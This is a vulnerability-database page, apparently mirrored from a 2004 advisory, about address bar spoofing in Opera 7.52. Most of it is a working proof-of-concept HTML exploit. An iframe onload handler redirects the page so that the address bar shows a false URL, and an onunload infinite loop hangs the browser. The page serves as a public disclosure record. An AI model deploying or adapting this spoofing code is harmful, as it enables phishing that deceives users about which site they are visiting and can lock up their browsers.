Opera Web Browser 7.5x – IFrame OnLoad Address Bar URL Obfuscation
漏洞ID | 1054514 | 漏洞类型 | |
发布时间 | 2004-07-08 | 更新时间 | 2004-07-08 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10679/info
Opera Web Browser is prone to a security weakness that may permit malicious web pages to spoof address bar information.
It is currently not known if this issue is related to the Opera Web Browser Address Bar Spoofing Weakness reported in BID 10337. As more information becomes available this BID will be updated.
This issue may be used to spoof information in the address bar, facilitating phishing attacks against unsuspecting users.
This issue is reported to affect Opera Web Browser version 7.52, it is likely that other versions are affected as well.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css">
<title>Opera 7.52 Address Bar Spoofing Vulnerability</title>
<style type="text/css">
<!-- /* begin */
h1 { font-size:120%;}
h2 { font-size:100%;}
/* end */ -->
</style>
<script type="text/javascript">
<!--
function urlfake(){
location.href="http://www.microsoft.com/";
}
function preinline () {
myvar = '<iframe onload="urlfake()" ';
myvar = myvar + 'title="preload inline frame" ';
myvar = myvar + 'src="http://www.opera.com/" ';
myvar = myvar + 'frameborder="0" width="760" height="1800" ';
myvar = myvar + 'marginwidth="0" marginheight="0">';
myvar = myvar + '<' + '/iframe>';
document.write (myvar);
}
// -->
</script>
</head>
<body onunload="while(1){};">
<h1>Opera Browser 7.52 (Build 3834) Address Bar Spoofing Issue</h1>
<h2>Tested on WindowsXP SP1</h2>
<p>
<script type="text/javascript">
<!--
preinline ();
// -->
</script>
</p>
</body>
</html>
相关推荐: Achrimede’s Gftpd Remote Privilege Escalation Vulnerability
Achrimede’s Gftpd Remote Privilege Escalation Vulnerability 漏洞ID 1100707 漏洞类型 Design Error 发布时间 2003-02-21 更新时间 2003-02-21 CVE编号 N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666